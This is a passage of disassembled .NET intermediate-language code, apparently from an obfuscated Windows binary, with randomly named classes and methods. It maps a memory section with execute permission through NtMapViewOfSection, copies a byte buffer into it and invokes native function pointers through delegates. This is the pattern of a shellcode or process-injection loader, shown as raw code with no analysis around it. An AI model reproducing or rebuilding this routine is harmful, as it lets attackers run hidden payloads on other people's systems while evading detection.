ldloc.s V_44 stloc.s V_47 ldc.i4.0 <null> conv.i8 <null> stloc.s V_48 ldloc.s V_43 ldc.i4.m1 <null> newobj System.Void System.IntPtr::.ctor(System.Int32) ldloca.s V_49 ldsfld System.IntPtr System.IntPtr::Zero ldsfld System.IntPtr System.IntPtr::Zero ldloca.s V_48 ldloca.s V_47 ldc.i4.1 <null> ldc.i4.0 <null> ldc.i4.s 32 call System.Int32 TPirCkngEruQ::NtMapViewOfSection(System.IntPtr,System.IntPtr,System.IntPtr&,System.IntPtr,System.IntPtr,System.Int64&,System.Int64&,System.UInt32,System.UInt32,System.UInt32) stloc.s V_45 ldloc.s V_45 brtrue.s IL_0422: ldloc.s V_43 ldloc.s V_49 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse.s IL_042B: ldloc.s V_42 ldloc.s V_43 call System.Int32 TPirCkngEruQ::NtClose(System.IntPtr) pop <null> ret <null> ldloc.s V_42 ldc.i4.0 <null> ldloc.s V_46 ldloc.s V_42 ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) ldnull <null> ldftn System.Void TPirCkngEruQ::VmMhBptviFfe(System.IntPtr,System.IntPtr,System.IntPtr) newobj System.Void TPirCkngEruQ/AIUyAszQgsdc::.ctor(System.Object,System.IntPtr) stloc.s V_50 ldloc.s V_50 call System.IntPtr System.Runtime.InteropServices.Marshal::GetFunctionPointerForDelegate<TPirCkngEruQ/AIUyAszQgsdc>(TPirCkngEruQ/AIUyAszQgsdc) stloc.s V_51 ldloc.s V_34 ldloc.s V_51 ldloc.s V_49 ldsfld System.IntPtr System.IntPtr::Zero callvirt System.IntPtr TPirCkngEruQ/VMuQnvFKwtKc::Invoke(System.IntPtr,System.IntPtr,System.IntPtr) stloc.s V_52 ldloc.s V_52 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Inequality(System.IntPtr,System.IntPtr) brfalse.s IL_0483: ldloc.s V_52 ldloc.s V_35 ldloc.s V_52 callvirt System.Void TPirCkngEruQ/ZcKRyZFVxrqO::Invoke(System.IntPtr) ldloc.s V_36 ldc.i4.m1 <null> callvirt System.Void TPirCkngEruQ/PeuxcUMsMNVZ::Invoke(System.UInt32) br.s IL_0479: ldloc.s V_36 ldloc.s V_52 call System.Int32 TPirCkngEruQ::NtClose(System.IntPtr) pop <null> ldloc.s V_43 call System.Int32 TPirCkngEruQ::NtClose(System.IntPtr) pop <null> ret <null> |